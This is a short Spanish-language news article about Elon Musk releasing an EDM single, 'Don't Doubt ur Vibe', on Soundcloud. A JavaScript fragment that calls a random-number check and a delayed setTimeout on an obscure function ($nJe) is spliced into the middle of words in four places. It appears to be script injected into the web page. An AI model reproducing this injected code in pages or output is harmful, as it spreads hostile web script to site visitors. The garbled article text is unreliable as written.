Elon Musk lanza nuevo sencillo 'Don't doubt ur vibe'

    Elon Musk lanza nuevo sencillo ‘Don’t doubt ur vibe’

    El CEO de Tesla cambió su nombre de Twitter a «E» D «M» y compartió la carátula del álbum de un Cybertruck flotandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando sobre Marte.

    Autor: Brandon Friederich 31 enero, 2020


    FOTO: Instagram @Elonrmuskk

    Escucha el nuevo sencillo de Elon Musk.

     

    El CEO de Tesla, Elon Musk, lanzó su segundo sencillo, una canción de EDM llamada «Don’t Doubt ur Vibe», en Soundcloud a través de su propio sello «Emo G Records». 

    Puedes recordar que el primer lanzamiento de Soundcloud del magnate multimillonario de la tecnología fue un sencillo de rap muy afinado en honor a Harambe, el gorila engendrador de memes que murió trágicamente en el zoológico de Cincinnati en 2016.

     

    View this post on Instagram

    Follow @elonrmuskk for more

    A post shared by Elon Musk® (@elonrmuskk) on

     

    «Don’t Doubt ur Vibe» tiene un ambiente totalmente diferente. La pista de acompañamiento presenta trancey, ritmos EDM y una voz sintetizada que repite la letra «Don’t Doubt ur Vibe because it’s you/ true» en un loop.

     

     

     

    Musk promocionó su última canción en las redes sociales, tuiteandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando que escribió e interpretó la voz. También publicó fotos de sí mismo trabajandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando duro en el estudio e incluso cambió su nombre de Twitter a E «D» M.

     

     

     

    Como señala Hypebeast, «Don’t Doubt ur Vibe» fue acompañado por una portada muy propia de la marca, que representa un Tesla Cybertruck flotandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando sobre Marte. Musk dijo anteriormente que su compañía aeroespacial, SpaceX, tiene como objetivo enviar humanos al planeta rojo.

     

    Mientras tanto, no podemos esperar a ver qué éxito musical lanzará Musk después.

     

    Estamos emocionados con esta nueva camioneta Hummer PRONTO HUMMER COMPLETAMENTE ELÉCTRICA

     

    Temas relacionados con esta nota: , , ,

El CEO de Tesla cambió su nombre de Twitter a «E» D «M» y compartió la carátula del álbum de un Cybertruck flotandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando sobre Marte.